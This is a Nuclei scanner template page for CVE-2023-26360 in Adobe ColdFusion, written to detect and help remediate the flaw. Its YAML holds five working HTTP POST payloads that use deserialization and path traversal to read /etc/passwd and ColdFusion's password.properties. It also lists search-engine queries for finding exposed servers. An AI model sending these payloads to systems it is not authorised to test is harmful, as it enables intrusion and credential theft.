Skip to content
Nuclei Templates

Adobe ColdFusion - Local File Read

ID: CVE-2023-26360

Severity: high

Author: DhiyaneshDK,7own

Tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev

Description

Section titled “Description”

Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier

YAML Source

Section titled “YAML Source”
id: CVE-2023-26360


info:
  name: Adobe ColdFusion - Local File Read
  author: DhiyaneshDK,7own
  severity: high
  description: |
    Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the necessary security patches or updates provided by Adobe to fix the vulnerability.
  reference:
    - https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26360
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html
    - http://packetstormsecurity.com/files/172079/Adobe-ColdFusion-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-26360
    cwe-id: CWE-284
    epss-score: 0.96298
    epss-percentile: 0.99537
    cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev


http:
  - raw:
      - |
        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}


      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}


      - |
        POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}


      - |
        POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}


      - |
        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d


    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "password="
          - "encrypted=true"
          - "adobe"
        condition: and


      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4b0a00483046022100a51a085c6304b9379d8fd94ed7bda3bf30670eb677f1257010c79fae7576de6a022100f13203aabed30294aea7014e73eeb3a3cb013fc07828d78cec0c63f67773026e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-26360.yaml"

View on Github